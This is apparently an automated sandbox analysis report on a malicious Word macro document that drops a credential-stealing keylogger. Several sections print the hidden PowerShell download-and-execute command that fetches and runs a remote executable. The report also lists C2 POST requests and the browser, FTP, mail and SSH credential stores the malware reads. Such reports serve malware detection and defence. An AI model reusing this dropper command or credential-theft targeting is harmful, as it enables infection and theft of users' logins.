
Analysis Report

Overview

General Information

Joe Sandbox Version: 22.0.0
Analysis ID: 50178
Start time: 22:28:35
Joe Sandbox Product: CloudBasic
Start date: 13.03.2018
Overall analysis duration: 0h 5m 15s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: BjgOdvod71.000 (renamed file extension from 000 to doc)
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.evad.expl.phis.spyw.troj.winDOC@7/10@3/3
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
EGA Information: Failed
HDC Information: Failed
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Number of clicks 0
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): WmiPrvSE.exe, OSPPSVC.EXE, WmiApSrv.exe, conhost.exe, dllhost.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe, wxkh.exe, wxkh.exe


Detection

Strategy    Score    Range      Reporting         Detection
Threshold   100      0 - 100    Report FP / FN    malicious


Confidence

Strategy    Score    Range    Further Analysis Required?    Confidence
Threshold   5        0 - 5    false


Classification

Analysis Advice

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook



Signature Overview



AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\wxkh.exe, virustotal: Detection: 23%
Multi AV Scanner detection for submitted file
Source: BjgOdvod7.doc, virustotal: Detection: 38%

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities
Source: C:\Users\user\AppData\Roaming\wxkh.exeWindow created: window name: CLIPBRDWNDCLASS
Installs a global keyboard hook
Source: C:\Users\user\AppData\Roaming\wxkh.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\wxkh.exe

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global trafficDNS query: name: peadarking.com
Potential document exploit detected (performs HTTP gets)
Source: global trafficTCP traffic: 192.168.2.3:49170 -> 78.137.164.80:80
Potential document exploit detected (unknown TCP traffic)
Source: global trafficTCP traffic: 192.168.2.3:49170 -> 78.137.164.80:80
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking:

Downloads files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTP
Source: global trafficHTTP traffic detected: GET /blackgate.ie/bless/kccInvoice.exe HTTP/1.1User-Agent: USR-KLHost: peadarking.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
Performs DNS lookups
Source: unknownDNS traffic detected: queries for: peadarking.com
Posts data to webserver
Source: unknownHTTP traffic detected: POST /blackgate.ie/bless/WebPanel/api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: peadarking.comContent-Length: 232Expect: 100-continueConnection: Keep-Alive
Urls found in memory or binary data
Source: wxkh.exeString found in binary or memory: file://
Source: wxkh.exeString found in binary or memory: file:///
Source: WINWORD.EXEString found in binary or memory: file:///C:
Source: wxkh.exe, enterprisesec.config.cch.new.7.dr, security.config.cch.new.7.drString found in binary or memory: file:///C:/Users/Sam
Source: wxkh.exeString found in binary or memory: file:///C:/Users/Sam%20Tarwe
Source: powershell.exeString found in binary or memory: file:///C:/Users/Sam%20Tarwell/AppData/Roaming/wxkh.exe
Source: powershell.exeString found in binary or memory: file:///C:/Users/Sam%20Tarwell/AppData/Roaming/wxkh.exeb
Source: wxkh.exeString found in binary or memory: file:///C:/Users/Sam%20Tarwell/Desktop/BjgOdvod71.doc
Source: wxkh.exeString found in binary or memory: file:///C:/Users/Sam%20Tarwell/Desktop/BjgOdvod71.doc4
Source: wxkh.exeString found in binary or memory: file:///C:/Users/Sam%20Tarwell/Desktop/BjgOdvod71.docX
Source: WINWORD.EXEString found in binary or memory: file:///C:/Users/Sam%20Tarwell/Desktop/BjgOdvod71.docft2
Source: WINWORD.EXEString found in binary or memory: file:///C:/Users/Sam%20Tarwell/Desktop/BjgOdvod71.dock
Source: powershell.exe, wxkh.exeString found in binary or memory: file:///C:/Windows/Microsoft.NET/Framework/v2.0.50727/
Source: powershell.exeString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/
Source: powershell.exeString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/en-US/Microso%
Source: powershell.exeString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/en-US/Microsoft.PowerShell.Commands.Management.re
Source: wxkh.exeString found in binary or memory: file:///C:/Windows/assemblp
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Diagnostics/1.0.0.0__31bf3856ad36
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Management/1.0.0.0__31bf3856ad364
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Utility/1.0.0.0__31bf3856ad364e35
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.ConsoleHost/1.0.0.0__31bf3856ad364e35/Micr
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Security/1.0.0.0__31bf3856ad364e35/Microso
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.WSMan.Management/1.0.0.0__31bf3856ad364e35/Microsoft.
Source: powershell.exeString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.M
Source: WINWORD.EXEString found in binary or memory: ftp://
Source: powershell.exe, wxkh.exeString found in binary or memory: http://
Source: wxkh.exeString found in binary or memory: http://checkip.dyndns.org
Source: wxkh.exeString found in binary or memory: http://checkip.dyndns.org/
Source: wxkh.exeString found in binary or memory: http://checkip.dyndns.orgx&
Source: powershell.exeString found in binary or memory: http://jav
Source: powershell.exeString found in binary or memory: http://java.com/
Source: powershell.exeString found in binary or memory: http://java.com/help
Source: powershell.exeString found in binary or memory: http://java.com/helphttp://java.com/help
Source: powershell.exeString found in binary or memory: http://peadarkin
Source: powershell.exeString found in binary or memory: http://peadarkinX
Source: powershell.exe, wxkh.exeString found in binary or memory: http://peadarking.com
Source: powershell.exeString found in binary or memory: http://peadarking.com/blac
Source: powershell.exeString found in binary or memory: http://peadarking.com/blackgate.
Source: powershell.exeString found in binary or memory: http://peadarking.com/blackgate.ie/bless/
Source: wxkh.exeString found in binary or memory: http://peadarking.com/blackgate.ie/bless/WebPanel/api.php
Source: powershell.exeString found in binary or memory: http://peadarking.com/blackgate.ie/bless/kccInvoice.exe
Source: powershell.exeString found in binary or memory: http://peadarking.com/blackgate.ie/bless/kccInvoice.exet
Source: powershell.exe, wxkh.exeString found in binary or memory: http://peadarking.comx&
Source: WINWORD.EXEString found in binary or memory: http://pur
Source: WINWORD.EXEString found in binary or memory: http://purl
Source: powershell.exeString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationFilter
Source: powershell.exeString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/SelectorFilter
Source: powershell.exeString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#IdentifyResponse
Source: WINWORD.EXEString found in binary or memory: http://www.msnusers.com
Downloads executable code via HTTP
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 13 Mar 2018 21:29:23 GMTServer: Apache/2.4.29 (cPanel) OpenSSL/1.0.2n mod_bwlimited/1.4Last-Modified: Tue, 13 Mar 2018 01:00:08 GMTETag: "1001f37-46e00-56740c7a6b340"Accept-Ranges: bytesContent-Length: 290304Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ac 3e 32 59 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 64 04 00 00 08 00 00 00 00 00 00 ae 83 04 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 04 00 00 02 00 00 00 00 00 00 02 00 40 85
HTTP GET or POST without a user agent
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: checkip.dyndns.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox ViewIP Address: 216.146.43.70
Internet Provider seen in connection with other malware
Source: Joe Sandbox ViewASN Name: DYNDNS-DynamicNetworkServicesIncUS
Uses a known web browser user agent for HTTP communication
Source: global trafficHTTP traffic detected: POST /blackgate.ie/bless/WebPanel/api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: peadarking.comContent-Length: 232Expect: 100-continueConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /blackgate.ie/bless/WebPanel/api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: peadarking.comContent-Length: 274Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /blackgate.ie/bless/WebPanel/api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: peadarking.comContent-Length: 274Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /blackgate.ie/bless/WebPanel/api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: peadarking.comContent-Length: 240Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /blackgate.ie/bless/WebPanel/api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: peadarking.comContent-Length: 960Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /blackgate.ie/bless/WebPanel/api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: peadarking.comContent-Length: 232Expect: 100-continue
Source: global trafficHTTP traffic detected: POST /blackgate.ie/bless/WebPanel/api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: peadarking.comContent-Length: 142070Expect: 100-continue
Domain name seen in connection with other malware
Source: Joe Sandbox ViewDomain Name: checkip.dyndns.org
May check the online IP address of the machine
Source: unknownDNS query: name: checkip.dyndns.org
Source: unknownDNS query: name: checkip.dyndns.org

Stealing of Sensitive Information:

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Roaming\wxkh.exeKey opened: HKEY_USERS\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\wxkh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\wxkh.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Roaming\wxkh.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Tries to steal Instant Messenger accounts or passwords
Source: C:\Users\user\AppData\Roaming\wxkh.exeKey opened: HKEY_USERS\Software\Paltalk
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Roaming\wxkh.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\wxkh.exeKey opened: HKEY_USERS\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\wxkh.exe
Tries to download and execute files (via powershell)
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\wxkh.exe') {Remove-Item $env:APPDATA + '\wxkh.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://peadarking.com/blackgate.ie/bless/kccInvoice.exe', $env:APPDATA + '\wxkh.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\wxkh.exe'); Stop-Process -Id $Pid -Force
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\wxkh.exe') {Remove-Item $env:APPDATA + '\wxkh.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://peadarking.com/blackgate.ie/bless/kccInvoice.exe', $env:APPDATA + '\wxkh.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\wxkh.exe'); Stop-Process -Id $Pid -Force

Data Obfuscation:

Binary may include packed or encrypted code
Source: initial sampleStatic PE information: section name: .text entropy: 7.8914501267
Suspicious powershell command line found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\wxkh.exe') {Remove-Item $env:APPDATA + '\wxkh.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://peadarking.com/blackgate.ie/bless/kccInvoice.exe', $env:APPDATA + '\wxkh.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\wxkh.exe'); Stop-Process -Id $Pid -Force
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\wxkh.exe') {Remove-Item $env:APPDATA + '\wxkh.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://peadarking.com/blackgate.ie/bless/kccInvoice.exe', $env:APPDATA + '\wxkh.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\wxkh.exe'); Stop-Process -Id $Pid -Force

Spreading:

Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

System Summary:

Found graphical window changes (likely an installer)
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Document has a 'comments' value indicative for goodware
Source: BjgOdvod7.docInitial sample: OLE summary comments = Aenean toCurabitur fermentum nisl lr pulvinar tortor quis metus tempus a. Praesent quis aliquet odio. ibero, sed varius toret rhoncus in vel purus.
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: mscorrc.pdb source: wxkh.exe
Source: Binary string: G:\o14sp1\65_VC8\VBE6\legovbe\vbe7.pdb source: WINWORD.EXE
Source: Binary string: G:\o14sp1\65_VC8\VBE6\legovbe\vbe7.pdb> source: WINWORD.EXE
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe
Source: Binary string: C:\Users\Admin\Desktop\IELibrary\IELibrary\obj\Debug\IELibrary.pdb source: wxkh.exe
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe
Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe
Source: Binary string: System.Management.Automation.pdb source: powershell.exe
Source: Binary string: C:\Windows\System.Management.Automation.pdb* source: powershell.exe
Document has a 'keywords' value indicative for goodware
Source: BjgOdvod7.docInitial sample: OLE summary keywords = x, , elit, ornare,a molestieMauris, condimentum, mi e vitae
Document has a 'bytes' value indicative for goodware
Source: BjgOdvod7.docInitial sample: OLE document summary bytes = 11000
Document has a 'subject' value indicative for goodware
Source: BjgOdvod7.docInitial sample: OLE summary subject = 3ULGM14X
.NET source code contains calls to encryption/decryption functions
Source: 7.2.wxkh.exe.600000.0.raw.unpack, A/Q.csCryptographic APIs: 'TransformBlock', 'TransformFinalBlock', 'CreateDecryptor'
Binary contains paths to development resources
Source: WINWORD.EXEBinary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K
Classification label
Source: classification engineClassification label: mal100.evad.expl.phis.spyw.troj.winDOC@7/10@3/3
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$gOdvod71.doc
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\SAMTAR~1\AppData\Local\Temp\CVRFDF6.tmp
Document contains an OLE Word Document stream indicating a Microsoft Word file
Source: BjgOdvod7.docOLE indicator, Word Document stream: true
Document contains summary information with irregular field values
Source: BjgOdvod7.docOLE document summary: edited time not present or 0
Found command line output
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........3Eg....#........3Eg......?.L|Dg.......j 'Jg...j.'v)L|Dg.............7Eg......Dg..?.(............... 'Jg..Dg....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................#..............v...................v..0.....H...\...(.......................#...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................/...A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.4.0.....H...\...(......................./..........."...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................/..............v...................v..0.....H...\...(......................./...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................;...(...h......v...................v..0.....H...\...(...V...................;...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................;..............v...................v..0.....H...\...(...s...................;...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................G...(...h......v...................v..0.....H...\...........................G...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................G..............v...................v..0.....H...\...........................G...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................S...(...h......v...................v..0.....H...\...........................S...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................S..............v...................v..0.....H...\...........................S...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................_...(...h......v...................v..0.....H...\......."..................._...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................_..............v...................v..0.....H...\.......=..................._...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................k...(...h......v...................v..0.....H...\.......e...................k...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................k..............v...................v..0.....H...\...........................k...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................w...(...h......v...................v..0.....H...\...........................w...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................w..............v...................v..0.....H...\...........................w...............>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................... . . .n.g.E.x.c.e.p.t.i.o.n....v..0.....H...\...........................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ...............................v...................v..0.....H...\...........................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................(...h......v...................v..0.....H...\...........................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ...............................v...................v..0.....H...\.......I...................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................... . . ...C.o.m.m.a.n.d.s...T.e.s.t.P.a.t.h.C.o.m.m.a.n.d.............................8...>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ...............................v...................v..0.....H...\...........................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................... ...h......v...................v..0.....H...\...........................................>..v........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ...............................v...................v..0.....H...\...........................................>..v........
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\wxkh.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\wxkh.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\wxkh.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\wxkh.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\wxkh.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\wxkh.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Queries process information (via WMI, Win32_Process)
Source: C:\Users\user\AppData\Roaming\wxkh.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
Reads software policies
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus (Virustotal or Metascan)
Source: BjgOdvod7.docVirustotal: hash found
Spawns processes
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\BjgOdvod71.doc
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\wxkh.exe') {Remove-Item $env:APPDATA + '\wxkh.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://peadarking.com/blackgate.ie/bless/kccInvoice.exe', $env:APPDATA + '\wxkh.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\wxkh.exe'); Stop-Process -Id $Pid -Force
Source: unknownProcess created: C:\Users\user\AppData\Roaming\wxkh.exe 'C:\Users\user\AppData\Roaming\wxkh.exe'
Source: unknownProcess created: C:\Users\user\AppData\Roaming\wxkh.exe C:\Users\user\AppData\Roaming\wxkh.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -noprofile If (test-path $env:APPDATA + '\wxkh.exe') {Remove-Item $env:APPDATA + '\wxkh.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://peadarking.com/blackgate.ie/bless/kccInvoice.exe', $env:APPDATA + '\wxkh.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\wxkh.exe'); Stop-Process -Id $Pid -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\wxkh.exe 'C:\Users\user\AppData\Roaming\wxkh.exe'
Source: C:\Users\user\AppData\Roaming\wxkh.exeProcess created: C:\Users\user\AppData\Roaming\wxkh.exe C:\Users\user\AppData\Roaming\wxkh.exe
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)
Source: wxkh.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Creates files inside the system directory
Source: C:\Users\user\AppData\Roaming\wxkh.exeFile created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch.new
Creates mutexes
Source: C:\Users\user\AppData\Roaming\wxkh.exeMutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Users\user\AppData\Roaming\wxkh.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Document contains embedded VBA macrosShow sources
Source: BjgOdvod7.docOLE indicator, VBA macros: true
Reads the hosts fileShow sources
